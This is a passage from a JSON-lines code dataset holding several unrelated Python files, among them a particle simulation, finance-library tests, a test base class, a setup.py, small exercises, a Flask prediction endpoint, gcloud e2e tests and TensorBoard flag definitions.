{10, 6, 7}), ('type', {6, 7}), ('wagon', {1, 4, 6, 7, 10, 13, 16, 17}), ('zone', {0, 1, 4, 6, 7, 10, 11, 12, 13, 16, 17})])\n\nsudoku(d)\n\n \n\n \n\n\n##print(\"Solving example\")\n##results, details, tickets = solve(ex2, cap=2020)\n##print(\"results\")\n##print(results)\n##print(\"Target\")\n##print(TARGET)\n##print(\"task 2\")\n##result = solve2(details, tickets)\n##print(results)\n\n\n \n\nprint(\"Success, solving puzzle input\")\n\nresults, details, tickets = solve(puzzle_input, cap=30000000)\nresult = solve2(details, tickets)\nprint(\"Result is\", result)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"DAY 16 - train tickets - ticket valid map.py","file_name":"DAY 16 - train tickets - ticket valid map.py","file_ext":"py","file_size_in_byte":8166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"511329198","text":"import sys\nimport os\nimport math\nimport random\nfrom JPackage import JPAstro\nfrom JPackage import JPThermal\nfrom JPackage.JMath import Vector3\nimport pandas as pd\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg\nfrom matplotlib.figure import Figure\nif os.name == 'posix':\n if sys.version_info[0] == 2:\n import Tkinter as Tk\n else:\n import tkinter as Tk\nif os.name == 'nt':\n import tkinter as Tk\n\nclass Main:\n\n global fig\n global canvas\n global ax\n global astro_eqs\n global therm_consts\n global particles\n global time_step\n global distance_scale\n global p_boxes\n global v_boxes\n global m_boxes\n global f_boxes\n\n def __init__(self):\n root = Tk.Tk()\n root.wm_title('Dark Matter Simulation')\n self.fig = Figure(figsize=(8, 8), dpi=100)\n self.ax = self.fig.add_subplot(111, projection='3d')\n self.canvas = FigureCanvasTkAgg(self.fig, master=root)\n self.canvas.get_tk_widget().pack(side=Tk.TOP, fill=Tk.BOTH, expand=1)\n self.canvas._tkcanvas.pack(side=Tk.TOP, fill=Tk.BOTH, expand=1)\n self.astro_eqs = JPAstro.Equations()\n self.therm_consts = JPThermal.Constants\n self.time_step = math.pow(10, 13)\n self.distance_scale = math.pow(10, 0)\n self.p_boxes = []\n self.v_boxes = []\n self.m_boxes = []\n self.f_boxes = []\n positions = []\n masses = []\n forces = []\n velocities = []\n for x in range(-120, 121, 40):\n for y in range(-120, 121, 40):\n for z in range(-120, 121, 40):\n offset_x = (random.random() - .5) * 20\n offset_y = (random.random() - .5) * 20\n offset_z = (random.random() - .5) * 20\n pos = Vector3(x + offset_x, y + offset_y, z + offset_z)\n #v_x = (random.random() - .5)\n #v_y = (random.random() - .5)\n #v_z = (random.random() - .5)\n #pos = Vector3(x, y, z)\n #vel = Vector3(v_x, v_y, v_z)\n positions.append(pos)\n masses.append(math.pow(10, 0))\n forces.append(Vector3(0, 0, 0))\n velocities.append(Vector3(0, 0, 0))\n\n for i in range(0, 241):\n self.p_boxes.append([])\n self.v_boxes.append([])\n self.m_boxes.append([])\n self.f_boxes.append([])\n for j in range(0, 241):\n self.p_boxes[i].append([])\n self.v_boxes[i].append([])\n self.m_boxes[i].append([])\n self.f_boxes[i].append([])\n for k in range(0, 241):\n self.p_boxes[i][j].append([])\n self.v_boxes[i][j].append([])\n self.m_boxes[i][j].append([])\n self.f_boxes[i][j].append([])\n data = {'Position' : positions, 'Mass' : masses, 'Force' : forces, 'Velocity' : velocities}\n\n self.particles = pd.DataFrame(data)\n\n self.Update()\n\n def Update(self):\n while True:\n print('Drawing')\n self.Draw()\n print('Putting In Boxes')\n self.Put_In_Boxes()\n print('Updating Gravity')\n self.Update_Gravity()\n print('Updating Pressure')\n self.Update_Pressure()\n print('Updating Velocities')\n self.Update_Velocities()\n print('Updating Positions')\n self.Update_Positions()\n\n def Put_In_Boxes(self):\n for i in range(0, len(self.particles['Position'])):\n p = self.particles['Position'][i]\n v = self.particles['Velocity'][i]\n m = self.particles['Mass'][i]\n f = self.particles['Force'][i]\n try:\n self.p_boxes[int(p.x) + 120][int(p.z) + 120][int(p.y) + 120].append(i)\n self.v_boxes[int(p.x) + 120][int(p.z) + 120][int(p.y) + 120].append(v)\n self.m_boxes[int(p.x) + 120][int(p.z) + 120][int(p.y) + 120].append(m)\n self.f_boxes[int(p.x) + 120][int(p.z) + 120][int(p.y) + 120].append(f)\n except:\n pass\n\n def Update_Pressure(self):\n for a in range(0, len(self.p_boxes)):\n for b in range(0, len(self.p_boxes[a])):\n for c in range(0, len(self.p_boxes[a][b])):\n pres = self.Get_Pressure(self.v_boxes[a][b][c], self.m_boxes[a][b][c])\n for i in range(0, len(self.p_boxes[a][b][c])):\n direction = self.particles['Position'][i].Subtract(Vector3(a, b, c)).Normalize()\n self.particles.set_value(i, self.p_boxes[a][b][c][i], 'Force', self.particles['Force'][i].Add(direction.Scalar_Mult(pres)))\n\n def Get_Pressure(self, vbox, mbox):\n n = len(vbox)\n if not n == 0:\n V = 1\n R = self.therm_consts.R\n t_tot = 0\n for i in range(0, n):\n vel = vbox[i]\n m = mbox[i]\n t = vel.Length() * vel.Length() * m / (3 * R)\n t_tot = t_tot + t\n T = t_tot / n\n p = n * R * T / V\n else:\n p = 0\n return(p)\n\n def Update_Gravity(self):\n for i in range(0, len(self.particles['Position']) - 1):\n for j in range(i + 1, len(self.particles['Position'])):\n if not i == j:\n m_i = self.particles['Mass'][i]\n m_j = self.particles['Mass'][j]\n p_i = self.particles['Position'][i]\n p_j = self.particles['Position'][j]\n R = p_i.Distance(p_j)\n direction = p_j.Subtract(p_i).Normalize()\n F = self.astro_eqs.Solve_Equation('F = (G M m) / (R^2)', 'F', m_i, m_j, R)\n grav_i = direction.Scalar_Mult(F)\n grav_j = grav_i.Scalar_Mult(-1)\n self.particles.set_value(i, 'Force', self.particles['Force'][i].Add(grav_i))\n self.particles.set_value(j, 'Force', self.particles['Force'][j].Add(grav_j))\n\n def Update_Velocities(self):\n for i in range(0, len(self.particles['Position'])):\n self.particles.set_value(i, 'Velocity', self.particles['Velocity'][i].Add(self.particles['Force'][i].Scalar_Mult(self.time_step)))\n\n def Update_Positions(self):\n for i in range(0, len(self.particles['Position'])):\n self.particles.set_value(i, 'Position', self.particles['Position'][i].Add(self.particles['Velocity'][i]))\n\n def Draw(self):\n xs = []\n ys = []\n zs = []\n us = []\n vs = []\n ws = []\n counter = 0\n for pos in self.particles['Position']:\n velocity = self.particles['Velocity'][counter]\n xs.append(pos.x)\n ys.append(pos.y)\n zs.append(pos.z)\n us.append(velocity.x)\n vs.append(velocity.y)\n ws.append(velocity.z)\n counter = counter + 1\n self.ax.clear()\n if sys.version_info[0] == 3:\n self.ax.quiver(xs, ys, zs, us, vs, ws, length = 10, pivot = 'tail', arrow_length_ratio = .75)\n self.ax.scatter(xs, ys, zs, c='r', s=10, marker = 'o')\n self.ax.set_xlim3d(-120, 120)\n self.ax.set_ylim3d(-120, 120)\n self.ax.set_zlim3d(-120, 120)\n self.ax.set_xlabel('X Label')\n self.ax.set_ylabel('Y Label')\n self.ax.set_zlabel('Z Label')\n self.canvas.draw()\n\n def rgb_to_hex(self, rgb):\n return '#%02x%02x%02x' % rgb\n\n def print_full(self, x):\n pd.set_option('display.max_rows', len(x))\n print(x)\n pd.reset_option('display.max_rows')\n\nif __name__ == '__main__':\n Main()\n","sub_path":"Dark_Matter_Simulation_2/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":8006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84353080","text":"# Lint as: python3\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for the market data.\"\"\"\nimport tensorflow.compat.v2 as tf\n\nimport tf_quant_finance as tff\n\nfrom tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import\n\ncore = tff.experimental.pricing_platform.framework.core\nmarket_data = tff.experimental.pricing_platform.framework.market_data\ninterpolation_method = tff.experimental.pricing_platform.framework.core.interpolation_method\n\n\n@test_util.run_all_in_graph_and_eager_modes\nclass MarketDataTest(tf.test.TestCase):\n\n def setUp(self):\n dates = [[2021, 2, 8], [2022, 2, 8], [2023, 2, 8], [2025, 2, 8],\n [2027, 2, 8], [2030, 2, 8], [2050, 2, 8]]\n discounts = [0.97197441, 0.94022746, 0.91074031, 0.85495089, 0.8013675,\n 0.72494879, 0.37602059]\n libor_3m_config = market_data.config.RateConfig(\n interpolation_method=interpolation_method.InterpolationMethod.LINEAR)\n\n self._rate_config = {\"USD\": {\"LIBOR_3M\": libor_3m_config}}\n risk_free_dates = [\n [2021, 2, 8], [2022, 2, 8], [2023, 2, 8], [2025, 2, 8], [2050, 2, 8]]\n risk_free_discounts = [\n 0.97197441, 0.94022746, 0.91074031, 0.85495089, 0.37602059]\n self._market_data_dict = {\"USD\": {\n \"risk_free_curve\":\n {\"dates\": risk_free_dates, \"discounts\": risk_free_discounts},\n \"OIS\":\n {\"dates\": dates, \"discounts\": discounts},\n \"LIBOR_3M\":\n {\"dates\": dates, \"discounts\": discounts},}}\n self._valuation_date = [(2020, 6, 24)]\n self._libor_discounts = discounts\n self._risk_free_discounts = risk_free_discounts\n super(MarketDataTest, self).setUp()\n\n def test_discount_curve(self):\n market = market_data.MarketDataDict(\n self._valuation_date,\n self._market_data_dict,\n config=self._rate_config)\n # Get the risk free discount curve\n risk_free_curve_type = core.curve_types.RiskFreeCurve(currency=\"USD\")\n risk_free_curve = market.yield_curve(risk_free_curve_type)\n # Get LIBOR 3M discount\n libor_3m = core.rate_indices.RateIndex(type=\"LIBOR_3M\")\n rate_index_curve_type = core.curve_types.RateIndexCurve(\n currency=\"USD\", index=libor_3m)\n libor_3m_curve = market.yield_curve(rate_index_curve_type)\n with self.subTest(\"RiskFree\"):\n discount_factor_nodes = risk_free_curve.discount_factor_nodes\n self.assertAllClose(discount_factor_nodes, self._risk_free_discounts)\n with self.subTest(\"LIBOR_3M\"):\n discount_factor_nodes = libor_3m_curve.discount_factor_nodes\n self.assertAllClose(discount_factor_nodes, self._libor_discounts)\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n","sub_path":"tf_quant_finance/experimental/pricing_platform/framework/market_data/market_data_test.py","file_name":"market_data_test.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"293641305","text":"\nimport testtools\nimport sys\nimport six\n\nfrom oslo_log import log as logging\nfrom frontend import config\nfrom frontend.lib import decorators\n#from nose.plugins.attrib import attr\nimport nose.plugins.attrib\n\n\nCONF = config.CONF\n\nLOG = logging.getLogger(__name__)\n\nidempotent_id = decorators.idempotent_id\n\nat_exit_set = set()\n\ndef attr(**kwargs):\n \"\"\"A decorator which applies the testtools attr decorator\n\n This decorator applies the testtools.testcase.attr if it is in the list of\n attributes to testtools we want to apply.\n \"\"\"\n \n def decorator(f):\n if 'type' in kwargs and isinstance(kwargs['type'], str):\n #f = testtools.testcase.attr(kwargs['type'])(f)\n f = nose.plugins.attrib.attr(kwargs['type'])(f)\n elif 'type' in kwargs and isinstance(kwargs['type'], list):\n \n for attr in kwargs['type']:\n #f = testtools.testcase.attr(attr)(f)\n f = nose.plugins.attrib.attr(attr)(f)\n return f\n \n return decorator\n\n\nclass BaseTestCase(testtools.testcase.WithAttributes,testtools.TestCase):\n setUpClassCalled = False\n \n def assertEmpty(self, list, msg=None):\n self.assertTrue(len(list) == 0, msg)\n\n def assertNotEmpty(self, list, msg=None):\n self.assertTrue(len(list) > 0, msg)\n \n @classmethod\n def setUpClass(cls):\n # It should never be overridden by descendants\n if hasattr(super(BaseTestCase, cls), 'setUpClass'):\n super(BaseTestCase, cls).setUpClass()\n cls.setUpClassCalled = True\n # Stack of (name, callable) to be invoked in reverse order at teardown\n cls.teardowns = []\n try:\n # Shortcuts to clients\n cls.setup_clients()\n cls.resource_setup()\n except Exception:\n etype, value, trace = sys.exc_info()\n LOG.info(\"%s raised in %s.setUpClass. Invoking tearDownClass.\" % (\n etype, cls.__name__))\n cls.tearDownClass()\n try:\n six.reraise(etype, value, trace)\n finally:\n del trace # to avoid circular refs\n\n @classmethod\n def tearDownClass(cls):\n at_exit_set.discard(cls)\n # It should never be overridden by descendants\n if hasattr(super(BaseTestCase, cls), 'tearDownClass'):\n super(BaseTestCase, cls).tearDownClass()\n # Save any existing exception, we always want to re-raise the original\n # exception only\n etype, value, trace = sys.exc_info()\n # If there was no exception during setup we shall re-raise the first\n # exception in teardown\n re_raise = (etype is None)\n while cls.teardowns:\n name, teardown = cls.teardowns.pop()\n # Catch any exception in tearDown so we can re-raise the original\n # exception at the end\n try:\n teardown()\n except Exception as te:\n sys_exec_info = sys.exc_info()\n tetype = sys_exec_info[0]\n # TODO(andreaf): Till we have the ability to cleanup only\n # resources that were successfully setup in resource_cleanup,\n # log AttributeError as info instead of exception.\n if tetype is AttributeError and name == 'resources':\n LOG.info(\"tearDownClass of %s failed: %s\" % (name, te))\n else:\n LOG.exception(\"teardown of %s failed: %s\" % (name, te))\n if not etype:\n etype, value, trace = sys_exec_info\n # If exceptions were raised during teardown, and not before, re-raise\n # the first one\n if re_raise and etype is not None:\n try:\n six.reraise(etype, value, trace)\n finally:\n del trace # to avoid circular refs\n \n \n @classmethod\n def setup_clients(cls):\n \"\"\"Create links to the clients into the test object.\"\"\"\n # TODO(andreaf) There is a fair amount of code that could me moved from\n # base / test classes in here. Ideally tests should be able to only\n # specify which client is `client` and nothing else.\n pass\n\n @classmethod\n def resource_setup(cls):\n \"\"\"Class level resource setup for test cases.\"\"\"\n pass\n\n \n","sub_path":"Apiautotesting/frontend/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508903253","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# To use a consistent encoding\nfrom os import path\nfrom codecs import open\n# Always prefer setuptools over distutils\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name = 'flask-procmc',\n packages = ['flask-procmc'],\n version = '0.0.1',\n description = 'A python wrapper around the pro.coinmarketcap.com API for flask.',\n author = 'Jordan Hansford',\n author_email = 'hansfordjordan@gmail.com',\n url = 'https://github.com/hansfordj/flask_procmc',\n project_urls={\n 'Bug Reports': 'https://github.com/hansfordj/flask_procmc/issues',\n 'Buy me a coffee': 'https://github.com/barnumbirr/coinmarketcap#buy-me-a-coffee',\n },\n license = 'Apache v2.0 License',\n install_requires=[\n 'requests>=2.18.4',\n 'requests_cache>=0.4.13'\n ],\n keywords = ['cryptocurrency', 'API', 'coinmarketcap','BTC', 'Bitcoin', 'LTC', 'Litecoin', 'XMR', 'Monero', 'ETH', 'Ethereum '],\n classifiers=[\n 'License :: OSI Approved :: Apache Software License',\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.7',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n long_description = long_description,\n long_description_content_type='text/markdown',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"21064809","text":"\"\"\"\n날짜 : 2021/05/13\n이름 : 김승용\n내용 : 코딩 테스트 - 숫자 카드 게임\n\"\"\"\n\n# n, m 을 공백으로 구분하여 입력 받기\nn, m = map(int, input('입력 :').split())\n\nnums = []\nresult = 0\n\nfor i in range(n):\n data = list(map(int, input('입력 :').split()))\n\n# data에서 가장 작은 수 구하기\ndata.sort()\nnum = data[0]\nnums.append(num)\n\n# nums 에서 가장 큰 값 구하기\nnums.sort()\nresult = nums[-1]\n\nprint(result)","sub_path":"CodingTest/Test02.py","file_name":"Test02.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"187394980","text":"import argparse\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom quickprediction.dbs.orderdb import OrderDB\nfrom quickprediction.prediction.predict import Predict\nfrom quickprediction.parsers.timeparser import TimeParser\nfrom quickprediction.config import Configuration\n\n\ndef monthRangeFrom(months=0):\n return datetime.today() + relativedelta(months=months)\n\n\ndef args():\n parser = argparse.ArgumentParser(\"Execute swarms and models.\")\n parser.add_argument(\n \"-s\", \"--swarmtype\",\n help=\"The swarm type to perform.\",\n dest=\"swarmtype\",\n choices=set((\"orderamount\", \"producttype\"))\n )\n parser.add_argument(\n \"-b\", \"--businessid\",\n help=\"The id of the business.\",\n dest=\"businessid\"\n )\n parser.add_argument(\n \"-m\", \"-monthsprior\",\n help=\"How far back data from the database should be fetched in months for swarming.\",\n dest=\"monthsprior\",\n type=int,\n default=-3\n )\n parser.add_argument(\n \"-d\", \"--dir\",\n help=\"The base directory to write the files to. \\\n If the directory does not exists, it will be created.\",\n dest=\"dir\"\n )\n return parser\n\n\nif __name__ == \"__main__\":\n args = args().parse_args()\n swarmType = args.swarmtype.upper()\n businessid = args.businessid\n directory = args.dir\n\n monthsprior = monthRangeFrom(args.monthsprior)\n\n config = Configuration()\n dbDetails = config.read([Configuration.DATABASES])[0][0]\n # Connect to the database\n database = OrderDB(\n dbDetails[\"uri\"],\n dbDetails[\"port\"],\n dbDetails[\"database\"],\n dbDetails[\"username\"],\n dbDetails[\"password\"]\n )\n database.connect()\n # Get orders from three months ago.\n orders = database.read(fromDate=monthsprior)\n # Parse out the number of orders for each hour of the last three months.\n hourlyOrders = TimeParser.extractHourlyOrders(orders, monthsprior)\n database.close()\n # Get ready to write to .csv file\n predict = Predict(businessid, swarmType, directory)\n predict.begin(hourlyOrders)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"103524683","text":"\"\"\"\nif the temperature is greater then 30, its a hot day otherwise\nif its less then 10: its a cold day;\notherwise its neither hot not cold\n\n\"\"\"\ntemperature = int(input('temperature:'))\ncold_day = 10 > temperature\nhot_day = 30< temperature\n\nif cold_day:\n print(f' its a old day')\nelif hot_day:\n print(f'its a hot day')\nelse:\n print(f'its neither hot nor cold')","sub_path":"condition.py/q_2.py","file_name":"q_2.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"507421577","text":"# -*- coding: utf-8 -*- #\n# Copyright 2017 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"E2e tests for 'category-manager assets' command group.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport contextlib\nfrom googlecloudsdk.api_lib.category_manager import utils\nfrom googlecloudsdk.core import resources\nfrom googlecloudsdk.core.util import retry\nfrom tests.lib import sdk_test_base\nfrom tests.lib.surface.category_manager import e2e_base as base\n\n\nclass AssetE2eTest(base.CategoryManagerE2eBase):\n \"\"\"E2e test for asset related commands.\"\"\"\n _BQ_TABLE_ASSET_FMT = 'projects/{project}/datasets/{dataset}/entries/{entry}'\n\n _BQ_DATASET = 'DO_NOT_DELETE_CATEGORY_MANAGER_TEST_DATASET'\n _BQ_TABLE = 'test_table1'\n\n def SetUp(self):\n self._asset = self._BQ_TABLE_ASSET_FMT.format(\n project=self.Project(), dataset=self._BQ_DATASET, entry=self._BQ_TABLE)\n\n @contextlib.contextmanager\n def TagAsset(self, asset, annotation):\n \"\"\"Tags an asset with an annotation.\"\"\"\n try:\n annotation_tag = self.Run(\n 'category-manager assets apply-annotation {} --annotation {} '.format(\n asset, annotation.name))\n yield annotation_tag\n finally:\n args = '{} --annotation {} --quiet'.format(asset, annotation.name)\n self.Run('category-manager assets delete-annotation ' + args)\n\n def testListAnnotationTagCommandOnBigQueryTableAsset(self):\n description = 'arbitrary-test-description'\n with self.CreateTaxonomyResource(description) as taxonomy, \\\n self.CreateAnnotationResource(taxonomy, description) as annotation, \\\n self.TagAsset(self._asset, annotation) as asset_tag:\n tag = self._ListAssetAnnotationTagsAndReturnMatch(self._asset,\n annotation.displayName)\n self.assertEqual(tag, asset_tag)\n\n def testApplyAnnotationCommandOnBigQueryTableAsset(self):\n description = 'arbitrary-test-description'\n with self.CreateTaxonomyResource(description) as taxonomy, \\\n self.CreateAnnotationResource(taxonomy, description) as annotation, \\\n self.TagAsset(self._asset, annotation) as asset_tag:\n escaped_asset = ('assets/projects%2Fcatman-e2e-test%2Fdatasets%2F'\n 'DO_NOT_DELETE_CATEGORY_MANAGER_TEST_DATASET%2Fentries'\n '%2Ftest_table1')\n expected_tag = utils.GetMessagesModule().AnnotationTag(\n annotation=annotation.name,\n annotationDisplayName=annotation.displayName,\n asset=escaped_asset,\n taxonomyDisplayName=taxonomy.displayName)\n self.assertEqual(asset_tag, expected_tag)\n\n def testDeleteAnnotationCommandOnBigQueryTableAsset(self):\n description = 'arbitrary-test-description'\n with self.CreateTaxonomyResource(description) as taxonomy, \\\n self.CreateAnnotationResource(taxonomy, description) as annotation, \\\n self.TagAsset(self._asset, annotation):\n tag = self._ListAssetAnnotationTagsAndReturnMatch(self._asset,\n annotation.displayName)\n self.assertIsNotNone(tag)\n\n args = '{} --annotation {} --quiet'.format(self._asset, annotation.name)\n self.Run('category-manager assets delete-annotation ' + args)\n\n tag = self._ListAssetAnnotationTagsAndReturnMatch(self._asset,\n annotation.displayName)\n self.assertIsNone(tag)\n\n def testSearchAssetsCommandOnBigQueryTableAsset(self):\n args = '\"project_id:{}\" --format=disable'.format(self.Project())\n assets = list(self.Run('category-manager assets search ' + args))\n table_asset = self._FindTableAsset(assets)\n self.assertIsNotNone(table_asset)\n\n def _FindTableAsset(self, assets):\n for asset in assets:\n if asset.subAsset is None and asset.name == self._asset:\n return asset\n\n def testAssetCommandGroupUserJourney(self):\n description = 'arbitrary-test-description'\n with self.CreateTaxonomyResource(description) as taxonomy:\n with self.CreateAnnotationResource(taxonomy, description) as annotation:\n taxonomy_resource = resources.REGISTRY.Parse(\n taxonomy.name, collection='categorymanager.projects.taxonomies')\n annotation_resource = resources.REGISTRY.Parse(\n annotation.name,\n collection='categorymanager.projects.taxonomies.annotations')\n\n # Search for BigQuery table asset.\n args = '\"project_id:{}\" --format=disable'.format(self.Project())\n assets = list(self.Run('category-manager assets search ' + args))\n table_asset = self._FindTableAsset(assets)\n self.assertIsNotNone(table_asset)\n\n # Tag asset with annotation.\n with self.TagAsset(table_asset.name, annotation) as asset_tag:\n listed_asset_tag = self._ListAssetAnnotationTagsAndReturnMatch(\n self._asset, annotation.displayName)\n self.assertEqual(asset_tag, listed_asset_tag)\n\n # Search for tagged asset based on annotation. We may have to retry\n # searching for the tagged asset a few times until Datahub's search\n # index updates which may take a few seconds.\n args = '--taxonomy {} --annotations {} --format=disable'.format(\n taxonomy_resource.taxonomiesId, annotation_resource.annotationsId)\n assets = retry.Retryer().RetryOnResult(\n lambda: list(self.Run('category-manager assets search ' + args)),\n should_retry_if=lambda result, _: not result,\n sleep_ms=[1000, 3000, 5000])\n self.assertEqual(len(assets), 1)\n tagged_table_asset = assets[0]\n self.assertEqual(table_asset, tagged_table_asset)\n\n\nif __name__ == '__main__':\n sdk_test_base.main()\n","sub_path":"google-cloud-sdk/lib/tests/e2e/surface/category_manager/assets/assets_e2e_test.py","file_name":"assets_e2e_test.py","file_ext":"py","file_size_in_byte":6361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438938672","text":"num_line=0\nnum_word=0\nwith open ('text_in.txt') as file:\n text = file.readlines()\n for line in text:\n words = line.split()\n for word in words:\n if word.find('аровоз')>-1:\n word = word.replace('воз', 'ход')\n words[num_word]=word\n line = ' '.join(words)\n text[num_line]=line\n num_word+=1\n num_line+=1\n num_word=0\n \n\nwith open ('text_out.txt', 'w') as file:\n file.write('\\n'.join(text))","sub_path":"Program.py","file_name":"Program.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"241954608","text":"from progress import Progress\n\nif __name__ == \"__main__\":\n loop = 1000000\n counter = 0\n\n print(loop)\n progress = Progress(loop)\n progress.progressBar(\"Calculation\")\n for i in range(loop):\n counter += i\n progress.tick(1)\n\n input()\n","sub_path":"progress/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"406677940","text":"import pandas as pd\r\n\r\ndict_v = {'one': pd.Series([1, 2, 3], index=['a', 'b', 'c']),\r\n 'two': pd.Series([1, 2, 3, 4], index=['a', 'b', 'c', 'd'])}\r\ndf = pd.DataFrame(dict_v)\r\n\r\ndf['three'] = pd.Series([10, 20, 30], index=['a', 'b', 'c'])\r\nprint(\"根据传递的系列添加新列:\\n{}\".format(df))\r\n\r\ndf['four'] = df['one'] + df['three']\r\nprint(\"使用存在的数据帧添加新列:\\n{}\".format(df))\r\n","sub_path":"chapter4/add_df_1.py","file_name":"add_df_1.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"133688880","text":"\n\n#calss header\nclass _FOUNTAIN():\n\tdef __init__(self,): \n\t\tself.name = \"FOUNTAIN\"\n\t\tself.definitions = [u'a stream of water that is forced up into the air through a small hole, especially for decorative effect, or the structure in a lake or pool from which this flows']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_fountain.py","file_name":"_fountain.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"189051562","text":"import datetime\nfrom flask import Flask, jsonify, abort, make_response, request\nfrom flask_restful import Api, Resource, reqparse, fields, marshal, marshal_with\nfrom flask_cors import CORS, cross_origin\nfrom flask import url_for\nfrom sklearn.externals import joblib\n\nAPP = Flask(__name__, static_url_path=\"\")\nCORS(APP)\nAPI = Api(APP)\nMODEL = None\n\n\nPrediction = {\n 'row': fields.String,\n 'p_class': fields.String\n}\n\nclass Prediction(Resource):\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('row', type=str, location='json')\n self.reqparse.add_argument('p_class', type=str, location='json')\n\n def post(self):\n json_data = request.get_json(force=True)\n return json_data\n\n\nAPI.add_resource(Prediction, '/predict')\n\nif __name__ == '__main__':\n MODEL = joblib.load('../../models/solution_ueb02/model.pkl')\n APP.run(host='0.0.0.0', port=5444 ,debug=True)\n\n","sub_path":"notebooks/henrik_ueb02/online.py","file_name":"online.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"528540246","text":"# Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Serve TensorFlow summary data to a web frontend.\n\nThis is a simple web server to proxy data from the event_loader to the web, and\nserve static web files.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging as base_logging\nimport os\nimport socket\nimport sys\nfrom werkzeug import serving\n\nfrom tensorflow.python.platform import app\nfrom tensorflow.python.platform import flags\nfrom tensorflow.python.platform import tf_logging as logging\nfrom tensorflow.python.summary import event_file_inspector as efi\nfrom tensorflow.tensorboard.backend import application\n\n\n# TensorBoard flags\n\nflags.DEFINE_string('logdir', '', \"\"\"logdir specifies the directory where\nTensorBoard will look to find TensorFlow event files that it can display.\nTensorBoard will recursively walk the directory structure rooted at logdir,\nlooking for .*tfevents.* files.\n\nYou may also pass a comma separated list of log directories, and TensorBoard\nwill watch each directory. You can also assign names to individual log\ndirectories by putting a colon between the name and the path, as in\n\ntensorboard 